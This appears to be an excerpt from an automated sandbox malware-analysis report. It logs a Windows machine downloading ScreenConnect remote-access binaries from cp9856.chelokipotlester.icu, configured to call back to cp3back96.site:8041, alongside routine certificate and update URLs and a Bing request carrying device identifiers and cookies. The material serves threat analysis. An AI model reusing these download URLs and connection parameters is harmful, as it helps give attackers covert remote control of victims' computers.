              Source: global trafficHTTP traffic detected: GET /Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= HTTP/1.1Host: cp9856.chelokipotlester.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?a75363d0418258491551ead6717ca895 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: c-ring.msedge.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?3d4619f8959a0bb944ce9eb8ccf482ff HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: c-ring.msedge.netConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: cp9856.chelokipotlester.icu
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: cp3back96.site
              Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1707317755X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 765Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: F2E248BEDDBB2D85122423C41028BFD40.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367404303.00000212BEF2F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cp9856.chelokipotlester.icu
              Source: svchost.exe, 00000004.00000002.2413049971.00000227B8E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Di
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabi
              Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000004.00000002.2413381367.00000227B8E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2111953241.00000227B8EE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2411041899.00000227B8102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2412232845.00000227B8E48000.00000004.00000020.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
              Source: svchost.exe, 00000004.00000002.2410173948.00000227B78E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
              Source: svchost.exe, 00000004.00000002.2414294076.00000227B8EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
              Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: 8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B0.14.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
              Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.14.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://ocsp.digicert.com0
